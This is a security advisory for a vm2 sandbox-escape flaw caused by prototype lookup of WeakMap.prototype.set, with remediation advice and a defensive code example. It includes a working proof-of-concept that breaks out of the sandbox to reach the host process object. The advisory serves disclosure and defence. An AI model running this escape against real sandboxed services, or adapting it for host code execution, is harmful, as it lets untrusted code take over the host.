SNYK-JS-VM2-2990237
## Overview

[vm2](https://github.com/patriksimek/vm2#readme) is a sandbox that can run untrusted code with whitelisted Node's built-in modules.

Affected versions of this package are vulnerable to Arbitrary Code Execution due to the usage of prototype lookup for the `WeakMap.prototype.set` method. Exploiting this vulnerability leads to access to a host object and a sandbox compromise.

## PoC

```js
const { VM } = require('vm2');
new VM().run(`
  const { set } = WeakMap.prototype;
  WeakMap.prototype.set = function(v) {
    return set.call(this, v, v);
  };
  Error.prepareStackTrace =
  Error.prepareStackTrace =
  (_, c) => c.map(c => c.getThis()).find(a => a);
  const { stack } = new Error();
  Error.prepareStackTrace = undefined;
  stack.process.exit(1);
`);
// Never gets executed.
console.log('Finished');
```

## Remediation

Upgrade `vm2` to version 3.9.10 or higher.

## References

- [GitHub Commit](https://github.com/patriksimek/vm2/pull/445/commits/3a9876482be487b78a90ac459675da7f83f46d69)
- [GitHub Issue](https://github.com/patriksimek/vm2/issues/444)
- [GitHub PR](https://github.com/patriksimek/vm2/pull/445)
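The root cause named in the overview, shown outside vm2 as an added example (not vm2's code; the helper names `recordByLookup`, `recordByCapture` and `demo` are hypothetical): bookkeeping that calls `map.set(...)` resolves the method through `WeakMap.prototype` at call time, while a reference captured before untrusted code runs is unaffected by later changes to the prototype.

```javascript
// Added illustration, not vm2 source. All function names are hypothetical.

// Captured once, before any untrusted code runs: the intrinsic functions themselves.
const weakMapSet = WeakMap.prototype.set;
const weakMapGet = WeakMap.prototype.get;
const reflectApply = Reflect.apply;

// Fragile: `map.set` is resolved through WeakMap.prototype at call time,
// so whatever function sits there at that moment receives the arguments.
function recordByLookup(map, wrapper, original) {
  map.set(wrapper, original);
}

// Hardened: invoke the captured intrinsic directly. No property lookup on
// WeakMap.prototype (or on Function.prototype.call) happens at call time.
function recordByCapture(map, wrapper, original) {
  reflectApply(weakMapSet, map, [wrapper, original]);
}

// Constructed scenario: replace the prototype method the way the PoC does,
// record one wrapper -> original mapping with each helper, then restore.
function demo() {
  const lookupMap = new WeakMap();
  const captureMap = new WeakMap();
  const wrapper = { role: 'wrapper' };   // constructed sample objects
  const original = { role: 'original' };

  WeakMap.prototype.set = function (v) {
    return reflectApply(weakMapSet, this, [v, v]); // stores key -> key
  };
  try {
    recordByLookup(lookupMap, wrapper, original);
    recordByCapture(captureMap, wrapper, original);
  } finally {
    WeakMap.prototype.set = weakMapSet; // put the intrinsic back
  }

  // Read back with the captured getter so the check itself is lookup-free.
  return {
    lookupIntact: reflectApply(weakMapGet, lookupMap, [wrapper]) === original,
    captureIntact: reflectApply(weakMapGet, captureMap, [wrapper]) === original,
  };
}

console.log(demo());
```

When auditing sandbox or membrane code for this class of bug, look for method calls on built-in collections (`.set`, `.get`, `.has`) in paths that run after untrusted code has had a chance to touch shared prototypes.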
Timeline
- Aug 24, 2022 CVE Updated
- Dec 20, 2022 CVE Published
References
- https://security.snyk.io/vuln/SNYK-JS-VM2-2990237 advisory
- https://learn.snyk.io/lesson/malicious-code-injection/ technical
- https://github.com/patriksimek/vm2#readme technical
- https://github.com/patriksimek/vm2/pull/445/commits/3a9876482be487b78a90ac459675da7f83f46d69 patch
- https://github.com/patriksimek/vm2/issues/444 issue
- https://github.com/patriksimek/vm2/pull/445 patch